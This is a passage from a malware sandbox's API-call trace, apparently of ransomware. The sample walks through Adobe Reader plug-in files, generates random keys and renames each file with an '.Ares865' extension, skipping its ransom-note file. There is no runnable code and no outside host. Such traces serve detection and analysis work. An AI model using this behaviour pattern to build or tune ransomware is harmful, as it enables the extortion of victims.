CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.ITA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.ita.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.068] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.068] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.069] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.069] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.071] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.072] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.072] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.072] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.JPN" | out: lpString1="Flash.JPN") returned="Flash.JPN" [0173.072] lstrlenW (lpString="Flash.JPN") returned 9 [0173.072] lstrlenW (lpString="Ares865") returned 7 [0173.072] lstrcmpiW (lpString1="ash.JPN", lpString2="Ares865") returned 1 [0173.073] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.JPN.Ares865") returned 89 [0173.073] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.jpn"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.JPN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.jpn.ares865"), dwFlags=0x1) returned 1 [0173.075] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.JPN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.jpn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.075] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.076] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.076] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.076] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.079] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.079] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.079] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.080] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.KOR" | out: lpString1="Flash.KOR") returned="Flash.KOR" [0173.080] lstrlenW (lpString="Flash.KOR") returned 9 [0173.080] lstrlenW (lpString="Ares865") returned 7 [0173.080] lstrcmpiW (lpString1="ash.KOR", lpString2="Ares865") returned 1 [0173.080] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.KOR.Ares865") returned 89 [0173.080] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.kor"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.KOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.kor.ares865"), dwFlags=0x1) returned 1 [0173.083] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.KOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.kor.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.083] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.083] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.084] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.084] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.086] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.086] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.087] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.087] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.mpp" | out: lpString1="Flash.mpp") returned="Flash.mpp" [0173.087] lstrlenW (lpString="Flash.mpp") returned 9 [0173.087] lstrlenW (lpString="Ares865") returned 7 [0173.087] lstrcmpiW (lpString1="ash.mpp", lpString2="Ares865") returned 1 [0173.088] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.mpp.Ares865") returned 89 [0173.088] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.mpp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.mpp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.mpp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.mpp.ares865"), dwFlags=0x1) returned 1 [0173.089] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.mpp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.mpp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.090] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=120832) returned 1 [0173.090] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.091] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.091] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.098] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.099] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.099] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.101] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.NLD" | out: lpString1="Flash.NLD") returned="Flash.NLD" [0173.101] lstrlenW (lpString="Flash.NLD") returned 9 [0173.101] lstrlenW (lpString="Ares865") returned 7 [0173.101] lstrcmpiW (lpString1="ash.NLD", lpString2="Ares865") returned 1 [0173.102] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.NLD.Ares865") returned 89 [0173.102] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.nld"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.NLD.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.nld.ares865"), dwFlags=0x1) returned 1 [0173.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.NLD.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.nld.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.104] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.104] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.105] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.105] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.107] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.108] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.108] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.108] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.NOR" | out: lpString1="Flash.NOR") returned="Flash.NOR" [0173.108] lstrlenW (lpString="Flash.NOR") returned 9 [0173.108] lstrlenW (lpString="Ares865") returned 7 [0173.108] lstrcmpiW (lpString1="ash.NOR", lpString2="Ares865") returned 1 [0173.109] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.NOR.Ares865") returned 89 [0173.109] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.nor"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.NOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.nor.ares865"), dwFlags=0x1) returned 1 [0173.113] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.NOR.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.nor.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.113] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.114] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.114] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.115] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.117] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.117] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.117] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.118] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.PTB" | out: lpString1="Flash.PTB") returned="Flash.PTB" [0173.118] lstrlenW (lpString="Flash.PTB") returned 9 [0173.118] lstrlenW (lpString="Ares865") returned 7 [0173.118] lstrcmpiW (lpString1="ash.PTB", lpString2="Ares865") returned 1 [0173.118] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.PTB.Ares865") returned 89 [0173.118] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.ptb"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.PTB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.ptb.ares865"), dwFlags=0x1) returned 1 [0173.125] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.PTB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.ptb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.125] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.125] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.126] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.126] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.128] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.129] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.129] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.130] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.SUO" | out: lpString1="Flash.SUO") returned="Flash.SUO" [0173.130] lstrlenW (lpString="Flash.SUO") returned 9 [0173.130] lstrlenW (lpString="Ares865") returned 7 [0173.130] lstrcmpiW (lpString1="ash.SUO", lpString2="Ares865") returned 1 [0173.130] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.SUO.Ares865") returned 89 [0173.130] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.suo"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.SUO.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.suo.ares865"), dwFlags=0x1) returned 1 [0173.132] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.SUO.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.suo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.133] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.133] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.133] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.134] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.136] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.136] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.136] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.137] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.SVE" | out: lpString1="Flash.SVE") returned="Flash.SVE" [0173.137] lstrlenW (lpString="Flash.SVE") returned 9 [0173.137] lstrlenW (lpString="Ares865") returned 7 [0173.137] lstrcmpiW (lpString1="ash.SVE", lpString2="Ares865") returned 1 [0173.137] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.SVE.Ares865") returned 89 [0173.137] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.sve"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.SVE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.sve.ares865"), dwFlags=0x1) returned 1 [0173.139] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.SVE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.sve.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.139] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.140] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.140] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.140] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.143] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.143] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.143] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.144] lstrcpyW (in: lpString1=0x2cce490, lpString2="Mcimpp.CAT.Ares865" | out: lpString1="Mcimpp.CAT.Ares865") returned="Mcimpp.CAT.Ares865" [0173.144] lstrlenW (lpString="Mcimpp.CAT.Ares865") returned 18 [0173.144] lstrlenW (lpString="Ares865") returned 7 [0173.144] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0173.144] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d6d7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MCIMPP.CHS", cAlternateFileName="")) returned 1 [0173.144] lstrcmpiW (lpString1="MCIMPP.CHS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.144] lstrcmpiW (lpString1="MCIMPP.CHS", lpString2="aoldtz.exe") returned 1 [0173.144] lstrcpyW (in: lpString1=0x2cce490, lpString2="MCIMPP.CHS" | out: lpString1="MCIMPP.CHS") returned="MCIMPP.CHS" [0173.144] lstrlenW (lpString="MCIMPP.CHS") returned 10 [0173.144] lstrlenW (lpString="Ares865") returned 7 [0173.144] lstrcmpiW (lpString1="MPP.CHS", lpString2="Ares865") returned 1 [0173.145] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.CHS.Ares865") returned 90 [0173.145] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.chs"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.CHS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.chs.ares865"), dwFlags=0x1) returned 1 [0173.146] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.CHS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.chs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.147] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6656) returned 1 [0173.147] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.148] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.148] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.150] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.151] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.151] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.151] lstrcpyW (in: lpString1=0x2cce490, lpString2="MCIMPP.CHT" | out: lpString1="MCIMPP.CHT") returned="MCIMPP.CHT" [0173.151] lstrlenW (lpString="MCIMPP.CHT") returned 10 [0173.151] lstrlenW (lpString="Ares865") returned 7 [0173.151] lstrcmpiW (lpString1="MPP.CHT", lpString2="Ares865") returned 1 [0173.152] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.CHT.Ares865") returned 90 [0173.152] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.cht"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.CHT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.cht.ares865"), dwFlags=0x1) returned 1 [0173.153] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.CHT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.cht.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.154] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6656) returned 1 [0173.154] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.155] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.155] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.157] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.158] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.158] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.158] lstrcpyW (in: lpString1=0x2cce490, lpString2="Mcimpp.DAN" | out: lpString1="Mcimpp.DAN") returned="Mcimpp.DAN" [0173.158] lstrlenW (lpString="Mcimpp.DAN") returned 10 [0173.158] lstrlenW (lpString="Ares865") returned 7 [0173.158] lstrcmpiW (lpString1="mpp.DAN", lpString2="Ares865") returned 1 [0173.159] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.DAN.Ares865") returned 90 